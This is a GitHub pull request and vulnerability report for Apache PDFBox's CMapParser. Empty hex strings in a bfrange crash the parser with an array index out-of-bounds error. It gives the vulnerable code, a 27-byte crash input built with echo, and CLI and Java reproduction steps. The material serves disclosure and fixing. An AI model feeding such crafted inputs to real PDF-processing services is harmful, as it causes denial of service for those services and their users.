OwenSanzas opened a new pull request, #411:
URL: https://github.com/apache/pdfbox/pull/411
# ArrayIndexOutOfBoundsException in CMapParser.increment()
## Summary
CMapParser in Apache PDFBox's fontbox component does not validate array bounds
when processing bfrange mappings. Malformed CMap data containing empty hex
strings (`<>`) therefore triggers an `ArrayIndexOutOfBoundsException`.
**Type**: Array Index Out-of-Bounds (CWE-129)
**Severity**: Medium
**Impact**: Denial of Service (application crash)
**Affected Component**: `fontbox/src/main/java/org/apache/fontbox/cmap/CMapParser.java:813`
## Root Cause
### Vulnerable Code (CMapParser.java:454-467)
```java
private void addMappingFrombfrange(CMap cmap, byte[] startCode, int values,
        byte[] tokenBytes)
{
    for (int i = 0; i < values; i++)
    {
        String value = createStringFromBytes(tokenBytes);
        cmap.addCharMapping(startCode, value);
        if (!increment(tokenBytes, tokenBytes.length - 1, strictMode))
        {
            break;
        }
        // passes -1 when startCode.length == 0
        increment(startCode, startCode.length - 1, false);
    }
}
```
### Crash Location (CMapParser.java:813)
```java
private static boolean increment(byte[] data, int position, boolean useStrictMode)
{
    // ...
    data[position] = (byte) (data[position] + 1); // CRASH: data[-1]
}
```
When malformed CMap data contains an empty hex string (`<>`) as the range start
code, `startCode` is a zero-length byte array. `startCode.length - 1` then
evaluates to -1, and `increment()` throws when it accesses `data[-1]`. Both
overloads of `addMappingFrombfrange()` have this issue.
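
The index arithmetic described above can be reproduced outside PDFBox. The following is a minimal sketch, not the PDFBox source: `unguardedIncrement` is a simplified stand-in for `increment()` (strict-mode handling is omitted), and `guardedIncrement` is a hypothetical helper showing one possible length check. The class and method names are assumptions made for illustration only.

```java
import java.util.Arrays;

public class IncrementGuardSketch {

    // Simplified stand-in for CMapParser.increment() (assumption: strict mode
    // omitted). Adds one to the byte at 'position' and carries into the
    // preceding byte when the current byte is 0xFF.
    static boolean unguardedIncrement(byte[] data, int position) {
        if (position > 0 && (data[position] & 0xFF) == 255) {
            data[position] = 0;
            return unguardedIncrement(data, position - 1);
        }
        // Throws ArrayIndexOutOfBoundsException when position == -1,
        // which is what happens for a zero-length array.
        data[position] = (byte) (data[position] + 1);
        return true;
    }

    // Hypothetical guard: refuse to increment an empty code instead of
    // computing the index length - 1 == -1.
    static boolean guardedIncrement(byte[] data) {
        if (data == null || data.length == 0) {
            return false;
        }
        return unguardedIncrement(data, data.length - 1);
    }

    public static void main(String[] args) {
        byte[] empty = new byte[0]; // what an empty hex string <> yields

        try {
            unguardedIncrement(empty, empty.length - 1);
        } catch (ArrayIndexOutOfBoundsException e) {
            System.out.println("unguarded call threw: " + e.getMessage());
        }

        System.out.println("guarded call returned: " + guardedIncrement(empty));

        // A non-empty code still increments with carry: 0x00FF becomes 0x0100.
        byte[] code = {0x00, (byte) 0xFF};
        guardedIncrement(code);
        System.out.println(Arrays.toString(code));
    }
}
```

Whether the check belongs inside `increment()` or in the callers is a design choice. Placing it in the callers would also allow the parser to skip or reject the malformed range before any mapping is added.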
## PoC
### Trigger file
A crafted `malicious_cmap.pdf` with a Type0 font containing malformed CMap
bfrange data with empty hex strings.
### How to generate crash.bin
```bash
echo -n '0<>2.beginbfrange<><><2223' > crash.bin
```
**Content** (27 bytes): CMap fragment with empty start/end codes in bfrange
section.
### How to generate malicious_cmap.pdf
```bash
python3 create_malicious_pdf_cmap.py
```
---
## Trigger Method 1: Official pdfbox-app CLI
```bash
java -jar pdfbox-app-4.0.0-SNAPSHOT.jar export:text -i malicious_cmap.pdf -o output.txt
```
**Output:**
```
java.lang.ArrayIndexOutOfBoundsException: Index -1 out of bounds for length 0
    at org.apache.fontbox.cmap.CMapParser.increment(CMapParser.java:813)
    at org.apache.fontbox.cmap.CMapParser.addMappingFrombfrange(CMapParser.java:466)
    at org.apache.fontbox.cmap.CMapParser.parseBeginbfrange(CMapParser.java:437)
    at org.apache.fontbox.cmap.CMapParser.parse(CMapParser.java:118)
    at org.apache.pdfbox.pdmodel.font.CMapManager.parseCMap(CMapManager.java:72)
    at org.apache.pdfbox.pdmodel.font.PDFont.readCMap(PDFont.java:221)
```
---
## Trigger Method 2: Direct API
```java
import org.apache.fontbox.cmap.CMap;
import org.apache.fontbox.cmap.CMapParser;
import org.apache.pdfbox.io.RandomAccessReadBuffer;

public class Reproduce {
    public static void main(String[] args) throws Exception {
        // bfrange entry whose start and end codes are empty hex strings
        byte[] cmapData = "1 beginbfrange\n<> <> <2223>\nendbfrange"
                .getBytes("US-ASCII");
        CMapParser parser = new CMapParser();
        CMap cmap = parser.parse(new RandomAccessReadBuffer(cmapData));
        // ArrayIndexOutOfBoundsException: Index -1 out of bounds for length 0
    }
}
```
---
## Impact
| Aspect | Details |
|--------|---------|
| **Type** | Denial of Service (DoS) |
| **Severity** | Medium |
| **Attack Vector** | Malicious PDF with crafted Type0 font (malformed CMap) |
| **Payload Size** | 27 bytes |
| **Affected Operations** | Text extraction, rendering, any PDF processing with Type0 fonts |
| **CWE** | CWE-129 (Improper Validation of Array Index) |
| **Related** | PDFBOX-6141, PDFBOX-6142 (related fixes, but this case not covered) |